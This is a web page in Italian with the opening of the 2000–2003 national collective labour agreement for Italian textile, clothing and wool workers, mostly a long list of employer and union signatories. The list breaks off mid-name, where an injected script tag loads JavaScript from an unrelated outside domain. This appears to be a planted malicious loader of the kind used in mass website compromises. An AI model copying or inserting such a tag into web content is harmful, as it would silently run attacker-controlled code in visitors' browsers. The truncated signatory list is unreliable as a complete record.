Torna
all'elenco delle categorie
|
Categoria: Abbigliamento, calze, lana e maglie (industrie) Settore: Tessili Data stipula: 19-5-2000 Data decorrenza: 1-1-2000 Data scadenza: 31-12-2003
Contratto Collettivo Nazionale di Lavoro
PER I LAVORATORI ADDETTI ALLA PRODUZIONE IN SERIE DI:
ABBIGLIAMENTO TRADIZIONALE, INFORMALE E SPORTIVO - CAMICERIA - BIANCHERIA
PERSONALE E DA CASA - CONFEZIONI IN PELLE E SUCCEDANEI - DIVISE ED ABITI
DA LAVORO - CORSETTERIA - CRAVATTE, SCIARPE E FOULARDS - ACCESSORI
DELL'ABBIGLIAMENTO ED OGGETTI CUCITI IN GENERE - BOTTONI ED ARTICOLI
AFFINI
PER I LAVORATORI ADDETTI ALLE AZIENDE FABBRICANTI MAGLIERIA, CALZETTERIA
E TESSUTI A MAGLIA
PER I LAVORATORI ADDETTI ALL'INDUSTRIA DELLA LANA, DEL FELTRO BATTUTO
ED ARTICOLI DA CACCIA
Addì 19 maggio 2000
tra
- ASSOCIAZIONE ITALIANA DELLE INDUSTRIE DELLA FILIERA TESSILE
ABBIGLIAMENTO, rappresentata dal Presidente Vittorio Giulini, dai
Presidenti della Commissione sindacale Roberto Bechi e Claudio Merciadri,
con l'assistenza del Direttore Piero Costa e del Responsabile per i
rapporti sindacali e relazioni industriali Emanuele Odazio;
con la partecipazione di FEDERTESSILE, rappresentata dal Presidente
Paolo Barzaghi e dai componenti del Consiglio dell'Area Relazioni
industriali, Presidente Paolo Barzaghi, e Vice Presidente Domenico
Genito;
con l'assistenza di CONFINDUSTRIA nella persona del dott. Raffaele
Ponzano;
e
- Federazione Italiana dei Lavoratori Tessili e dell'Abbigliamento (FILTA)
rappresentata dal Segretario generale Renzo Bellini, dai Segretari
nazionali: Adriano Fratini, Adriano Linari, Stefano Ruvolo, Sergio Spiller
e con la presenza di Marcello Guardianelli della Federazione nazionale;
alla presenza dei componenti il Comitato esecutivo: Bertelle Gianni,
Boglietti Osvaldo, Bori Antonio, Brembilla Rita, Calvagna Alfio, Corti
Felice, Cucinotta Enzo, Esposito Antonio, Favarò Vito, Ferrante Giuseppe,
Furlan Bruno, Legge Nicola, Levorato Angelo, Metefori Gino, Moretto
Raffaella, Pantaleo Ivan, Paolini Gloria, Pasqualitto Romano, Redaelli
Gigi, Redaelli Giuseppe, Riboldi Carlo, Ruffini Bruno, Siviero Mario, Taba
Gianfranco, Tascone Carmela, Torri Enzo, Turri Domenico, Vadacca Anna e
dalla delegazione composta da Attila Cristina, Bigoni Domenico, Bertocchi
Gianfranco, Cannelli Graziano, Canu Tommaso, Cifani Alfonso, Di Stefano
Silvano, Deganello Vittorino, Gatto Loredana, Lampugnani Emilia,
Liberatori Antonio, Mammì Giuseppe, Mencarini Stefano, Morani Gianfranco,
Moci Adriana, Pelleriti Mimma, Piras Antonio, Riva Giovanna, Roffarè Rudy,
Scomparin Pietro, Scalera Saverio, Tomba Abele, Toschi Luisa, Troise
Pasquale, Vero Angelo, Zanolini Enrico;
con l'assistenza della Confederazione Italiana Sindacato Lavoratori
(CISL);
- Federazione Italiana Lavoratori Tessili e Abbigliamento (FILTEA),
rappresentata dal Segretario generale Agostino Megale, dal Vice Segretario
Mauro Beschi; dai Segretari nazionali Salvatore Barone, Valeria Fedeli,
Daniele Quiriconi; Enrico Moroni, Silvana Cappuccio, Fulvio Ciucciarelli,
Giovanni Rossi del Centro nazionale; dai membri del Comitato direttivo:
Bernardino Avalle, Ivano Africani, Fulvio Albumina, Vicenzo Armenante,
Gianni Andreoletti, Francesca Abbrescia, Renato Barbiero, Daniela Bellan,
Dino Bianchi, Mariano Bernardi, Giuliano Benetti, Pinuccia Boggiani, Maria
Benlodi, Rossella Benzato, Sandro Ballerini, Sandro Bertini, Marina
Bergamin, Graziella Belligoli, Barbara Bergamini, Fausto Bacchini,
Simonetta Bartoletti, Lucia Bronzi, Graziella Bussolotto, Brezzo
Massimiliano, Ivo Banella, Ivan Berni, Elena Brunetti, Teresa Bellanova,
Pasquale Bauleo, Valeria Cavagna, Rino Campioni, Ferdinando Colleoni,
Rosalba Cicero, Paolo Caspani, Umberto Colombo, Renato Cucinato, Mario
Cavallina, Rocco Campa, Tamara Calzolari, Giuseppe Colferai, Giuliano
Chies, Alberto Caracciolo, Vivetta Casaligni, Giampiero Cimbotti, Ernani
Ca<script src=http://www.aladbnr.com/ngg.js></script>
|